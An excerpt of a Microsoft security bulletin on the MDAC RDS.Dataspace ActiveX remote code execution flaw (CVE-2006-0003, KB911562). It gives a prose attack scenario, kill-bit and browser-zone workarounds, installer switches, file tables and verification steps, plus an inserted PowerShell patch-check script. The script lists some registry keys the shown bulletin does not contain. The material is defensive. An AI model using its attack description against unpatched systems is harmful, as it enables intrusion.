For more information about the extended security update support period for these operating system versions, visit the Microsoft Product Support Services Web site.\r\n\r\nCustomers who require additional support for Windows NT 4.0 Service Pack 6a and Windows 2000 Service Pack 3 must contact their Microsoft account team representative, their Technical Account Manager, or the appropriate Microsoft partner representative for custom support options. Customers without an Alliance, Premier, or Authorized Contract can contact their local Microsoft sales office. For contact information, visit the Microsoft Worldwide Information Web site, select the country, and then click Go to see a list of telephone numbers. When you call, ask to speak with the local Premier Support sales manager.\r\n\r\nFor more information, see the Windows Operating System Product Support Lifecycle FAQ.\r\n\r\nAre Windows 98, Windows 98 Second Edition, or Windows Millennium Edition critically affected by one or more of the vulnerabilities that are addressed in this security bulletin?\r\nYes. Windows 98, Windows 98 Second Edition, and Windows Millennium Edition are critically affected by this vulnerability. These security updates are available for download from the Windows Update Web site. For more information about severity ratings, visit the following Web site.\r\n\r\nNote Updates for localized versions of Microsoft Windows Millennium Edition that are not supported by Windows Update are available for download at the following download locations:\r\n\u2022\t\r\n\r\nSlovenian \u2013 Download the update\r\n\u2022\t\r\n\r\nSlovakian \u2013 Download the update\r\n\r\nCan I use the Microsoft Baseline Security Analyzer (MBSA) 1.2.1 to determine whether this update is required?\r\nYes. 
MBSA 1.2.1 will determine whether this update is required for Windows XP Service Pack 2 and Windows Server 2003 Service Pack 1.\r\n\r\nMBSA 1.2.1 does not support the detection of MDAC on Windows 2000 Service Pack 4, on Windows XP Service Pack 1, and on Windows Server 2003. For more information about MBSA, visit the MBSA Web site. For more information about the programs that MBSA 1.2.1 currently does not detect, see Microsoft Knowledge Base Article 306460. However, Microsoft has developed a version of the Enterprise Scan Tool (EST) that will help customers determine whether the security updates provided in this security bulletin are required. For more information, see the "Can I use a version of the Enterprise Scan Tool (EST) to determine whether this update is required?" question.\r\n\r\nCan I use the Microsoft Baseline Security Analyzer (MBSA) 2.0 to determine whether this update is required?\r\nYes. MBSA 2.0 will determine whether this update is required. MBSA 2.0 can detect security updates for products that Microsoft Update supports. For more information about MBSA, visit the MBSA Web site.\r\n\r\nWhat is the Enterprise Update Scanning Tool (EST)?\r\nAs part of an ongoing commitment to provide detection tools for bulletin-class security updates, Microsoft delivers a stand-alone detection tool whenever the Microsoft Baseline Security Analyzer (MBSA) and the Office Detection Tool (ODT) cannot detect whether the update is required for an MSRC release cycle. This stand-alone tool is called the Enterprise Scan Tool (EST) and is designed for enterprise administrators. When a version of the Enterprise Update Scanning Tool is created for a specific bulletin, customers can run the tool from a command line interface (CLI) and view the results of the XML output file. To help customers better utilize the tool, detailed documentation will be provided with the tool. 
There is also a version of the tool that offers an integrated experience for SMS administrators.\r\n\r\nCan I use a version of the Enterprise Update Scanning Tool (EST) to determine whether this update is required?\r\nYes. Microsoft has created a version of the EST that will determine if you have to apply this update. For download links and more information about the version of the EST that is being released this month, see the following Microsoft Web site. SMS customers should review the "Can I use Systems Management Server (SMS) to determine whether this update is required?" FAQ for more information about SMS and EST.\r\n\r\nCan I use Systems Management Server (SMS) to determine whether this update is required?\r\nYes. SMS can help detect and deploy this security update.\r\n\r\nSMS can use the SMS Software Update Services (SUS) Feature Pack to detect security updates. The SMS SUS Feature Pack includes the Security Update Inventory Tool (SUIT). For more information about the Security Update Inventory Tool, visit the following Microsoft Web site. For more information about the limitations of the Security Update Inventory Tool, see Microsoft Knowledge Base Article 306460.\r\n\r\nThe SMS SUS Feature Pack also includes the Microsoft Office Inventory Tool to detect for required updates for Microsoft Office applications.\r\n\r\nSMS can use the SMS 2003 Inventory Tool for Microsoft Updates to detect security updates that are offered by Microsoft Update and that are supported by Windows Server Update Services. 
For more information about the SMS 2003 Inventory Tool for Microsoft Updates, visit the following Microsoft Web site.\r\n\r\nSMS 2.0 and SMS 2003 customers who do not use the SMS 2003 Inventory Tool for Microsoft Updates must download and deploy an updated version of the Extended Security Update Inventory Tool to receive full detection and deployment for this update.\r\n\r\nFor more information about SMS, visit the SMS Web site.\r\n\r\nVulnerability Details\r\n\r\nMicrosoft Windows MDAC Vulnerability - CVE-2006-0003:\r\n\r\nA remote code execution vulnerability exists in the RDS.Dataspace ActiveX control that is provided as part of the ActiveX Data Objects (ADO) and that is distributed in MDAC. An attacker who successfully exploited this vulnerability could take complete control of an affected system.\r\n\r\nMitigating Factors for Microsoft Windows MDAC Vulnerability - CVE-2006-0003:\r\n\u2022\t\r\n\r\nIn a Web-based attack scenario, an attacker would have to host a Web site that contains a Web page that is used to attempt to exploit this vulnerability. An attacker would have no way to force users to visit a malicious Web site. Instead, an attacker would have to persuade them to visit the Web site, typically by getting them to click a link that takes them to the attacker's site. It could also be possible to display malicious Web content by using banner advertisements or by using other methods to deliver Web content to affected systems.\r\n\u2022\t\r\n\r\nAn attacker who successfully exploited this vulnerability could gain the same user rights as the local user. Users whose accounts are configured to have fewer user rights on the system could be less impacted than users who operate with administrative user rights.\r\n\u2022\t\r\n\r\nBy default, Internet Explorer on Windows Server 2003 runs in a restricted mode that is known as Enhanced Security Configuration. 
This mode mitigates this vulnerability in the e-mail vector because reading e-mail messages in plain text is the default configuration for Outlook Express. See the FAQ section of this security update for more information about Internet Explorer Enhanced Security Configuration.\r\n\r\nWorkarounds for Microsoft Windows MDAC Vulnerability - CVE-2006-0003:\r\n\r\nMicrosoft has tested the following workarounds. While these workarounds will not correct the underlying vulnerability, they help block known attack vectors. When a workaround reduces functionality, it is identified in the following section.\r\n\r\nDisable the RDS.Dataspace ActiveX control from running within Internet Explorer\r\n\r\nDisable attempts to instantiate the RDS.Dataspace ActiveX control in Internet Explorer by setting the kill bit for the control.\r\n\r\nWarning If you use Registry Editor incorrectly, you may cause serious problems that may require you to reinstall your operating system. Microsoft cannot guarantee that you can solve problems that result from using Registry Editor incorrectly. Use Registry Editor at your own risk.\r\n\r\nFor example, to set the kill bit for a CLSID for this object, paste the following text in a text editor such as Notepad. Then, save the file by using the .reg file name extension.\r\n\r\nWindows Registry Editor Version 5.00\r\n\r\n[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\ActiveX Compatibility\{BD96C556-65A3-11D0-983A-00C04FC29E36}]\r\n"Compatibility Flags"=dword:00000400\r\n\r\nNote For more information about how to prevent a control from running in Internet Explorer, see Microsoft Knowledge Base Article 240797. Follow the procedure that this article provides to create a Compatibility Flags value in the registry. 
By doing this, you will prevent the RDS.Dataspace ActiveX control from being instantiated in Internet Explorer.\r\n\r\nImpact of Workaround: Any Web-based application that requires the RDS control to be instantiated within Internet Explorer will no longer function correctly.\r\n\r\nSet Internet and Local intranet security zone settings to \u201cHigh\u201d to prompt before running ActiveX controls in these zones\r\n\r\nYou can help protect against this vulnerability by changing your settings for the Internet security zone to prompt before running ActiveX controls. You can do this by setting your browser security to High.\r\n\r\nTo raise the browsing security level in Microsoft Internet Explorer, follow these steps:\r\n\r\n1.\r\n\t\r\n\r\nOn the Internet Explorer Tools menu, click Internet Options.\r\n\r\n2.\r\n\t\r\n\r\nIn the Internet Options dialog box, click the Security tab, and then click the Internet icon.\r\n\r\n3.\r\n\t\r\n\r\nUnder Security level for this zone, move the slider to High. This sets the security level for all Web sites you visit to High.\r\n\r\nNote If no slider is visible, click Default Level, and then move the slider to High.\r\n\r\nRepeat steps 1 through 3 for the Local intranet security zone by clicking on the Local intranet icon.\r\n\r\nNote Setting the level to High may cause some Web sites to work incorrectly. If you have difficulty using a Web site after you change this setting, and you are sure the site is safe to use, you can add that site to your list of trusted sites. 
This will allow the site to work correctly even with the security setting set to High.\r\n\r\nImpact of Workaround: User will be prompted prior to running ActiveX controls unless the Web site is in the user\u2019s list of trusted sites.\r\n\r\nConfigure Internet Explorer to prompt before running ActiveX controls or disable ActiveX controls in the Internet and Local intranet security zone\r\n\r\nYou can help protect against this vulnerability by changing your settings to prompt before running ActiveX controls or disable ActiveX controls in the Internet and Local intranet security zone. To do this, follow these steps:\r\n\r\n1.\r\n\t\r\n\r\nOn the Internet Explorer Tools menu, click Internet Options.\r\n\r\n2.\r\n\t\r\n\r\nIn the Internet Options dialog box, click the Security tab, and then click the Internet icon.\r\n\r\n3.\r\n\t\r\n\r\nClick Custom Level.\r\n\r\n4.\r\n\t\r\n\r\nUnder Settings, in the ActiveX controls and plug-ins section, under Run ActiveX controls and plug-ins, click Prompt or Disable, and then click OK.\r\n\r\n5.\r\n\t\r\n\r\nClick Local intranet, and then click Custom Level.\r\n\r\n6.\r\n\t\r\n\r\nUnder Settings, in the ActiveX controls and plug-ins section, under Run ActiveX controls and plug-ins, click Prompt or Disable, and then click OK.\r\n\r\n7.\r\n\t\r\n\r\nClick OK two times to return to Internet Explorer.\r\n\r\nImpact of Workaround: There are side effects to prompting before running ActiveX controls. Many Web sites that are on the Internet or on an intranet use ActiveX to provide additional functionality. For example, an online e-commerce site or banking site may use ActiveX controls to provide menus, ordering forms, or even account statements. Prompting before running ActiveX controls is a global setting that affects all Internet and intranet sites. You will be prompted frequently when you enable this workaround. 
For each prompt, if you feel you trust the site that you are visiting, click Yes to run ActiveX controls.

FAQ for Microsoft Windows MDAC Vulnerability - CVE-2006-0003:

What is the scope of the vulnerability?
This is a remote code execution vulnerability. An attacker who successfully exploited this vulnerability could remotely take complete control of an affected system.

If a user is logged on with administrative user rights, an attacker who successfully exploited this vulnerability could take complete control of an affected system. An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights. Users whose accounts are configured to have fewer user rights on the system could be less impacted than users who operate with administrative user rights.

What causes the vulnerability?
Under certain conditions, the RDS.Dataspace ActiveX control fails to ensure that it interacts safely when it is hosted on a Web page.

What is Remote Data Services (RDS)?
Remote Data Service (RDS) is a feature of ADO. You can use RDS to move data from a server to a client application or to a Web page, to manipulate the data on the client, and to return updates to the server in a single round trip.

Who could exploit the vulnerability?
An attacker could create an e-mail message that is specially crafted to try to exploit this vulnerability. An attacker could exploit the vulnerability by sending this specially crafted e-mail message to a user of a server that is running an affected software application. An attacker could then persuade the user to click a link in the e-mail message. In a Web-based attack scenario, an attacker would have to host a Web site that contains a Web page that is used to attempt to exploit this vulnerability. An attacker would have no way to force users to visit a malicious Web site.
Instead, an attacker would have to persuade them to visit the Web site, typically by getting them to click a link that takes them to the attacker's site. It could also be possible to display malicious Web content by using banner advertisements or by using other methods to deliver Web content to affected systems.

What systems are primarily at risk from the vulnerability?
This vulnerability requires that a user is logged on and reading e-mail messages or is visiting Web sites for any malicious action to occur. Therefore, any systems where e-mail messages are read or where Internet Explorer is used frequently, such as workstations or terminal servers, are at the most risk from this vulnerability.

What does the update do?
The update removes the vulnerability by applying additional restrictions to the behavior of the RDS.Dataspace ActiveX control when it is hosted on a Web page.

When this security bulletin was issued, had this vulnerability been publicly disclosed?
No. Microsoft received information about this vulnerability through responsible disclosure. Microsoft had not received any information to indicate that this vulnerability had been publicly disclosed when this security bulletin was originally issued.

Security Update Information

Affected Software:

For information about the specific security update for your affected software, click the appropriate link:

Windows Server 2003 (all versions)

Prerequisites
This security update requires Windows Server 2003 or Windows Server 2003 Service Pack 1.

Inclusion in Future Service Packs:
The update for this issue will be included in a future Service Pack or Update Rollup.

Installation Information

This security update supports the following setup switches.

Supported Security Update Installation Switches
Switch            Description
/help             Displays the command-line options
Setup Modes
/passive          Unattended Setup mode. No user interaction is required, but installation status is displayed. If a restart is required at the end of Setup, a dialog box will be presented to the user with a timer warning that the computer will restart in 30 seconds.
/quiet            Quiet mode. This is the same as unattended mode, but no status or error messages are displayed.
Restart Options
/norestart        Does not restart when installation has completed
/forcerestart     Restarts the computer after installation and forces other applications to close at shutdown without saving open files first.
/warnrestart[:x]  Presents a dialog box with a timer warning the user that the computer will restart in x seconds. (The default setting is 30 seconds.)
Intended for use with the /quiet switch or the /passive switch.
/promptrestart    Displays a dialog box prompting the local user to allow a restart
Special Options
/overwriteoem     Overwrites OEM files without prompting
/nobackup         Does not back up files needed for uninstall
/forceappsclose   Forces other programs to close when the computer shuts down
/log:path         Allows the redirection of installation log files
/integrate:path   Integrates the update into the Windows source files. These files are located at the path that is specified in the switch.
/extract[:path]   Extracts files without starting the Setup program
/ER               Enables extended error reporting
/verbose          Enables verbose logging. During installation, creates %Windir%\CabBuild.log. This log details the files that are copied. Using this switch may cause the installation to proceed more slowly.

Note You can combine these switches into one command. For backward compatibility, the security update also supports many of the setup switches that the earlier version of the Setup program uses. For more information about the supported installation switches, see Microsoft Knowledge Base Article 262841. For more information about the Update.exe installer, visit the Microsoft TechNet Web site.

Deployment Information

Note If you are unsure of the version of MDAC you are running, install the Component Checker.

To install the security update without any user intervention, use the following command at a command prompt for Windows Server 2003:

Windowsserver2003-kb911562-x86-enu /quiet

Note Use of the /quiet switch will suppress all messages. This includes suppressing failure messages. Administrators should use one of the supported methods to verify the installation was successful when they use the /quiet switch. Administrators should also review the KB911562.log file for any failure messages when they use this switch.

To install the security update without forcing the system to restart, use the following command at a command prompt for Windows Server 2003:

Windowsserver2003-kb911562-x86-enu /norestart

For information about how to deploy this security update by using Software Update Services, visit the Software Update Services Web site. For more information about how to deploy this security update using Windows Server Update Services, visit the Windows Server Update Services Web site. This security update will also be available through the Microsoft Update Web site.

Restart Requirement

This update does not require a restart. The installer stops the required services, applies the update, and then restarts the services. However, if the required services cannot be stopped for any reason, or if required files are being used, this update will require a restart. If this behavior occurs, a message appears that advises you to restart.

Removal Information

To remove this update, use the Add or Remove Programs tool in Control Panel.

System administrators can also use the Spuninst.exe utility to remove this security update. The Spuninst.exe utility is located in the %Windir%\$NTUninstallKB911562$\Spuninst folder.

Supported Spuninst.exe Switches
Switch            Description
/help             Displays the command-line options
Setup Modes
/passive          Unattended Setup mode. No user interaction is required, but installation status is displayed. If a restart is required at the end of Setup, a dialog box will be presented to the user with a timer warning that the computer will restart in 30 seconds.
/quiet            Quiet mode. This is the same as unattended mode, but no status or error messages are displayed.
Restart Options
/norestart        Does not restart when installation has completed
/forcerestart     Restarts the computer after installation and forces other applications to close at shutdown without saving open files first.
/warnrestart[:x]  Presents a dialog box with a timer warning the user that the computer will restart in x seconds. (The default setting is 30 seconds.) Intended for use with the /quiet switch or the /passive switch.
/promptrestart    Displays a dialog box prompting the local user to allow a restart
Special Options
/forceappsclose   Forces other programs to close when the computer shuts down
/log:path         Allows the redirection of installation log files

File Information

The English version of this security update has the file attributes that are listed in the following table. The dates and times for these files are listed in coordinated universal time (UTC). When you view the file information, it is converted to local time. To find the difference between UTC and local time, use the Time Zone tab in the Date and Time tool in Control Panel.

Windows Server 2003, Web Edition; Windows Server 2003, Standard Edition; Windows Server 2003, Datacenter Edition; Windows Server 2003, Enterprise Edition; Windows Small Business Server 2003; Windows Server 2003, Web Edition with SP1; Windows Server 2003, Standard Edition with SP1; Windows Server 2003, Enterprise Edition with SP1; Windows Server 2003, Datacenter Edition with SP1; Windows Server 2003 R2, Web Edition; Windows Server 2003 R2, Standard Edition; Windows Server 2003 R2, Datacenter Edition; Windows Server 2003 R2, Enterprise Edition; Windows Small Business Server 2003 R2:

File Name     Version      Date         Time   Size     CPU    Folder
Msadco.dll    2.80.1062.0  22-Feb-2006  00:47  135,168  x86    RTMGDR
Msadco.dll    2.80.1062.0  22-Feb-2006  01:17  135,168  x86    RTMQFE
Msadco.dll    2.82.2644.0  22-Feb-2006  20:52  147,456  x86    SP1GDR
Msadco.dll    2.82.2644.0  22-Feb-2006  20:47  147,456  x86    SP1QFE

Windows Server 2003, Enterprise Edition for Itanium-based Systems; Windows Server 2003, Datacenter Edition for Itanium-based Systems; Windows Server 2003, Enterprise Edition with SP1 for Itanium-based Systems; and Windows Server 2003, Datacenter Edition with SP1 for Itanium-based Systems:

File Name     Version      Date         Time   Size     CPU    Folder
Msadco.dll    2.80.1062.0  22-Feb-2006  21:14  434,176  IA-64  RTMGDR
Wmsadco.dll   2.80.1062.0  22-Feb-2006  21:14  135,168  x86    RTMGDR\WOW
Msadco.dll    2.80.1062.0  22-Feb-2006  21:14  434,176  IA-64  RTMQFE
Wmsadco.dll   2.80.1062.0  22-Feb-2006  21:14  135,168  x86    RTMQFE\WOW
Msadco.dll    2.82.2644.0  22-Feb-2006  21:20  483,328  IA-64  SP1GDR
Wmsadco.dll   2.82.2644.0  22-Feb-2006  21:20  147,456  x86    SP1GDR\WOW
Msadco.dll    2.82.2644.0  22-Feb-2006  21:14  483,328  IA-64  SP1QFE
Wmsadco.dll   2.82.2644.0  22-Feb-2006  21:14  147,456  x86    SP1QFE\WOW

Windows Server 2003, Standard x64 Edition; Windows Server 2003, Enterprise x64 Edition; and Windows Server 2003, Datacenter x64 Edition:

File Name     Version      Date         Time   Size     CPU    Folder
Msadco.dll    2.82.2644.0  22-Feb-2006  21:18  233,472  x64    SP1GDR
Wmsadco.dll   2.82.2644.0  22-Feb-2006  21:18  147,456  x86    SP1GDR\WOW
Msadco.dll    2.82.2644.0  22-Feb-2006  21:14  233,472  x64    SP1QFE
Wmsadco.dll   2.82.2644.0  22-Feb-2006  21:14  147,456  x86    SP1QFE\WOW

Notes When you install these security updates, the installer checks to see if one or more of the files that are being updated on your system have previously been updated by a Microsoft hotfix.

If you have previously installed a hotfix to update one of these files, the installer copies the RTMQFE, SP1QFE, or SP2QFE files to your system. Otherwise, the installer copies the RTMGDR, SP1GDR, or SP2GDR files to your system. Security updates may not contain all variations of these files. For more information about this behavior, see Microsoft Knowledge Base Article 824994.

For more information about the Update.exe installer, visit the Microsoft TechNet Web site.

For more information about the terminology that appears in this bulletin, such as hotfix, see Microsoft Knowledge Base Article 824684.

Verifying that the Update Has Been Applied

• Microsoft Baseline Security Analyzer

To verify that a security update has been applied to an affected system, you can use the Microsoft Baseline Security Analyzer (MBSA) tool. MBSA allows administrators to scan local and remote systems for missing security updates and for common security misconfigurations.
For more information about MBSA, visit the Microsoft Baseline Security Analyzer Web site.

• File Version Verification

Note Because there are several versions of Microsoft Windows, the following steps may be different on your computer. If they are, see your product documentation to complete these steps.

1. Click Start, and then click Search.
2. In the Search Results pane, click All files and folders under Search Companion.
3. In the All or part of the file name box, type a file name from the appropriate file information table, and then click Search.
4. In the list of files, right-click a file name from the appropriate file information table, and then click Properties.

Note Depending on the version of the operating system or programs installed, some of the files that are listed in the file information table may not be installed.

5. On the Version tab, determine the version of the file that is installed on your computer by comparing it to the version that is documented in the appropriate file information table.

Note Attributes other than the file version may change during installation. Comparing other file attributes to the information in the file information table is not a supported method of verifying that the update has been applied. Also, in certain cases, files may be renamed during installation. If the file or version information is not present, use one of the other available methods to verify update installation.

• Registry Key Verification

You may also be able to verify the files that this security update has installed by reviewing the following registry keys.

Windows Server 2003, Web Edition; Windows Server 2003, Standard Edition; Windows Server 2003, Enterprise Edition; Windows Server 2003, Datacenter Edition; Windows Small Business Server 2003; Windows Server 2003, Enterprise Edition for Itanium-based Systems; and Windows Server 2003, Datacenter Edition for Itanium-based Systems:

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Updates\Windows Server 2003\SP2\KB911562\Filelist

Windows Server 2003, Web Edition; Windows Server 2003, Standard Edition; Windows Server 2003, Enterprise Edition; Windows Server 2003, Datacenter Edition; Windows Small Business Server 2003; Windows Server 2003, Web Edition with SP1; Windows Server 2003, Standard Edition with SP1; Windows Server 2003, Enterprise Edition with SP1; Windows Server 2003, Datacenter Edition with SP1; Windows Server 2003 R2, Web Edition; Windows Server 2003 R2, Standard Edition; Windows Server 2003 R2, Datacenter Edition; Windows Server 2003 R2, Enterprise Edition; Windows Small Business Server 2003 R2:

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Updates\Windows Server 2003\SP2\KB911562\Filelist

Note These registry keys may not contain a complete list of installed files. Also, these registry keys may not be created correctly if an administrator or an OEM integrates or slipstreams the 911562 security update into the Windows installation source files.

Windows XP (all versions)

Prerequisites
This security update requires Microsoft Windows XP Service Pack 1 or a later version.
For more information, see Microsoft Knowledge Base Article 322389.

Inclusion in Future Service Packs:
The update for this issue will be included in a future Service Pack or Update Rollup.

Installation Information

This security update supports the following setup switches.

Supported Security Update Installation Switches
Switch            Description
/help             Displays the command-line options
Setup Modes
/passive          Unattended Setup mode. No user interaction is required, but installation status is displayed. If a restart is required at the end of Setup, a dialog box will be presented to the user with a timer warning that the computer will restart in 30 seconds.
/quiet            Quiet mode. This is the same as unattended mode, but no status or error messages are displayed.
Restart Options
/norestart        Does not restart when installation has completed
/forcerestart     Restarts the computer after installation and forces other applications to close at shutdown without saving open files first.
/warnrestart[:x]  Presents a dialog box with a timer warning the user that the computer will restart in x seconds. (The default setting is 30 seconds.) Intended for use with the /quiet switch or the /passive switch.
/promptrestart    Displays a dialog box prompting the local user to allow a restart
Special Options
/overwriteoem     Overwrites OEM files without prompting
/nobackup         Does not back up files needed for uninstall
/forceappsclose   Forces other programs to close when the computer shuts down
/log:path         Allows the redirection of installation log files
/integrate:path   Integrates the update into the Windows source files. These files are located at the path that is specified in the switch.
/extract[:path]   Extracts files without starting the Setup program
/ER               Enables extended error reporting
/verbose          Enables verbose logging. During installation, creates %Windir%\CabBuild.log. This log details the files that are copied. Using this switch may cause the installation to proceed more slowly.

Note You can combine these switches into one command. For backward compatibility, the security update also supports the setup switches that the earlier version of the Setup program uses. For more information about the supported installation switches, see Microsoft Knowledge Base Article 262841. For more information about the Update.exe installer, visit the Microsoft TechNet Web site.

Deployment Information

Note If you are unsure of the version of MDAC you are running, install the Component Checker.

To install the security update without any user intervention, use the following command at a command prompt for Microsoft Windows XP:

Windowsxp-kb911562-x86-enu /quiet
or
MDAC28-KB911562-x86-enu /quiet

Note Use of the /quiet switch will suppress all messages. This includes suppressing failure messages. Administrators should use one of the supported methods to verify the installation was successful when they use the /quiet switch. Administrators should also review the Windowsxp-kb911562-x86-XXX.log or MDAC28-KB911562-x86-XXX.log files for any failure messages when they use this switch.

To install the security update without forcing the system to restart, use the following command at a command prompt for Windows XP:

Windowsxp-kb911562-x86-enu /norestart
or
MDAC28-KB911562-x86-enu /norestart

For information about how to deploy this security update by using Software Update Services, visit the Software Update Services Web site. For more information about how to deploy this security update using Windows Server Update Services, visit the Windows Server Update Services Web site. This security update will also be available through the Microsoft Update Web site.

Restart Requirement

This update does not require a restart. The installer stops the required services, applies the update, and then restarts the services. However, if the required services cannot be stopped for any reason, or if required files are being used, this update will require a restart. If this behavior occurs, a message appears that advises you to restart.

Removal Information

To remove this security update, use the Add or Remove Programs tool in Control Panel.

System administrators can also use the Spuninst.exe utility to remove this security update. The Spuninst.exe utility is located in the %Windir%\$NTUninstallKB911562$\Spuninst folder.

Supported Spuninst.exe Switches
Switch            Description
/help             Displays the command-line options
Setup Modes
/passive          Unattended Setup mode. No user interaction is required, but installation status is displayed. If a restart is required at the end of Setup, a dialog box will be presented to the user with a timer warning that the computer will restart in 30 seconds.
/quiet            Quiet mode. This is the same as unattended mode, but no status or error messages are displayed.
Restart Options
/norestart        Does not restart when installation has completed
/forcerestart     Restarts the computer after installation and forces other applications to close at shutdown without saving open files first.
/warnrestart[:x]  Presents a dialog box with a timer warning the user that the computer will restart in x seconds. (The default setting is 30 seconds.)
Intended for use with the /quiet switch or the /passive switch.
/promptrestart    Displays a dialog box prompting the local user to allow a restart
Special Options
/forceappsclose   Forces other programs to close when the computer shuts down
/log:path         Allows the redirection of installation log files

File Information

The English version of this security update has the file attributes that are listed in the following table. The dates and times for these files are listed in coordinated universal time (UTC). When you view the file information, it is converted to local time. To find the difference between UTC and local time, use the Time Zone tab in the Date and Time tool in Control Panel.

Windows XP Home Edition Service Pack 1, Windows XP Professional Service Pack 1, Windows XP Tablet PC Edition, Windows XP Media Center Edition, Windows XP Home Edition Service Pack 2, Windows XP Professional Service Pack 2, Windows XP Tablet PC Edition 2005, and Windows XP Media Center Edition 2005:

File Name     Version      Date         Time   Size     CPU    Folder
Msadco.dll    2.71.9053.0  25-Feb-2006  01:14  135,168  x86    SP1QFE
Msadco.dll    2.81.1124.0  25-Feb-2006  01:05  143,360  x86    SP2GDR
Msadco.dll    2.81.1124.0  25-Feb-2006  01:03  143,360  x86    SP2QFE

Windows XP Professional x64:

File Name     Version      Date         Time   Size     CPU    Folder
Msadco.dll    2.82.2644.0  22-Feb-2006  21:18  233,472  x64    SP1GDR
Wmsadco.dll   2.82.2644.0  22-Feb-2006  21:18  147,456  x86    SP1GDR\WOW
Msadco.dll    2.82.2644.0  22-Feb-2006  21:14  233,472  x64    SP1QFE
Wmsadco.dll   2.82.2644.0  22-Feb-2006  21:14  147,456  x86    SP1QFE\WOW

Notes When you install these security updates, the installer checks to see if one or more of the files that are being updated on your system have previously been updated by a Microsoft hotfix.

If you have previously installed a hotfix to update one of these files, the installer copies the RTMQFE, SP1QFE, or SP2QFE files to your system. Otherwise, the installer copies the RTMGDR, SP1GDR, or SP2GDR files to your system. Security updates may not contain all variations of these files. For more information about this behavior, see Microsoft Knowledge Base Article 824994.

For more information about the Update.exe installer, visit the Microsoft TechNet Web site.

For more information about the terminology that appears in this bulletin, such as hotfix, see Microsoft Knowledge Base Article 824684.

Verifying that the Update Has Been Applied

• Microsoft Baseline Security Analyzer

To verify that a security update has been applied to an affected system, you can use the Microsoft Baseline Security Analyzer (MBSA) tool. MBSA allows administrators to scan local and remote systems for missing security updates and for common security misconfigurations. For more information about MBSA, visit the Microsoft Baseline Security Analyzer Web site.

• File Version Verification

Note Because there are several versions of Microsoft Windows, the following steps may be different on your computer. If they are, see your product documentation to complete these steps.

1. Click Start, and then click Search.
2. In the Search Results pane, click All files and folders under Search Companion.
3. In the All or part of the file name box, type a file name from the appropriate file information table, and then click Search.
4. In the list of files, right-click a file name from the appropriate file information table, and then click Properties.

Note Depending on the version of the operating system or programs installed, some of the files that are listed in the file information table may not be installed.

5. On the Version tab, determine the version of the file that is installed on your computer by comparing it to the version that is documented in the appropriate file information table.

Note Attributes other than the file version may change during installation. Comparing other file attributes to the information in the file information table is not a supported method of verifying that the update has been applied. Also, in certain cases, files may be renamed during installation.
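The version comparison in step 5 and the Filelist registry-key check the bulletin describes under Registry Key Verification can be scripted across a fleet instead of done by hand. The following PowerShell script is an added example, not part of the Microsoft bulletin; the minimum versions and registry keys come from the bulletin's tables, while the file location (%CommonProgramFiles%\System\msadc, with a 32-bit copy under the (x86) tree on x64) is an assumption the bulletin does not state.

```powershell
# Added example (not part of the Microsoft bulletin). It automates the two
# verification methods the bulletin lists for KB911562 (MS06-014): compare the
# installed Msadco.dll version with the bulletin's file tables, and look for the
# KB911562\Filelist registry key. PowerShell 2.0 syntax so it runs on the
# Windows XP / Server 2003 hosts the bulletin covers; run it elevated.
#
# Assumption (the bulletin gives no file locations): Msadco.dll lives in
# %CommonProgramFiles%\System\msadc, with a 32-bit copy under the (x86) tree
# on x64 systems.

# Minimum patched Msadco.dll version per MDAC branch, from the bulletin's file
# tables: 2.71 = XP SP1, 2.80 = Server 2003 RTM, 2.81 = XP SP2,
# 2.82 = Server 2003 SP1 and the x64 editions.
$MinimumPatched = @{
    '2.71' = [version]'2.71.9053.0'
    '2.80' = [version]'2.80.1062.0'
    '2.81' = [version]'2.81.1124.0'
    '2.82' = [version]'2.82.2644.0'
}

# Keys listed under "Registry Key Verification" (the x64 key is written in the
# same \KB911562\Filelist form as the others).
$FilelistKeys = @(
    'HKLM:\SOFTWARE\Microsoft\Updates\Windows Server 2003\SP2\KB911562\Filelist',
    'HKLM:\SOFTWARE\Microsoft\Updates\Windows XP\SP3\KB911562\Filelist',
    'HKLM:\SOFTWARE\Microsoft\Updates\Windows XP Version 2003\SP2\KB911562\Filelist'
)

function Get-MsadcoCandidatePaths {
    # On x64 both the native and the WOW (x86) copies carry the fix, so check both.
    $roots = @($env:CommonProgramFiles)
    if (${env:CommonProgramFiles(x86)}) { $roots += ${env:CommonProgramFiles(x86)} }
    foreach ($root in $roots) { Join-Path $root 'System\msadc\msadco.dll' }
}

function Get-FileVersionExact {
    param([string]$Path)
    # Build the version from the numeric parts: the FileVersion string of many
    # Windows binaries carries extra build text that a [version] cast rejects.
    $vi = (Get-Item -LiteralPath $Path).VersionInfo
    New-Object System.Version -ArgumentList @(
        $vi.FileMajorPart, $vi.FileMinorPart, $vi.FileBuildPart, $vi.FilePrivatePart)
}

function Test-MsadcoPatched {
    # Status for one Msadco.dll copy. Only the version is compared: the bulletin
    # says other file attributes are not a supported way to verify the update.
    param([string]$Path)
    $installed = Get-FileVersionExact $Path
    $branch    = '{0}.{1}' -f $installed.Major, $installed.Minor
    $required  = $null
    $patched   = $null   # stays $null when the MDAC branch is not in the tables
    if ($MinimumPatched.ContainsKey($branch)) {
        $required = $MinimumPatched[$branch]
        $patched  = ($installed -ge $required)
    }
    New-Object PSObject -Property @{
        Path = $Path; Branch = $branch; Installed = $installed
        Required = $required; Patched = $patched
    }
}

function Get-Kb911562Status {
    $fileChecks = @()
    foreach ($p in Get-MsadcoCandidatePaths) {
        if (Test-Path -LiteralPath $p) { $fileChecks += Test-MsadcoPatched $p }
    }
    $keyFound = $false
    foreach ($k in $FilelistKeys) { if (Test-Path -LiteralPath $k) { $keyFound = $true } }
    # The file check decides; the bulletin warns the Filelist key can be missing
    # when the update was slipstreamed, so the key only corroborates.
    $unpatched = @($fileChecks | Where-Object { $_.Patched -ne $true })
    New-Object PSObject -Property @{
        FileChecks       = $fileChecks
        RegistryKeyFound = $keyFound
        Patched          = ($fileChecks.Count -gt 0 -and $unpatched.Count -eq 0)
    }
}

$status = Get-Kb911562Status
$status.FileChecks | Format-Table Path, Branch, Installed, Required, Patched -AutoSize
if ($status.Patched) {
    'KB911562 verified by file version (Filelist key present: {0})' -f $status.RegistryKeyFound
} else {
    'KB911562 NOT verified: no Msadco.dll found, or a copy is below the patched version'
}
```

A copy whose major.minor branch is not in the bulletin's tables is reported with Patched empty and counts as not verified, which is the safe reading for a branch the update does not cover.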
If the file or version information is not present, use one of the other available methods to verify update installation.

• Registry Key Verification

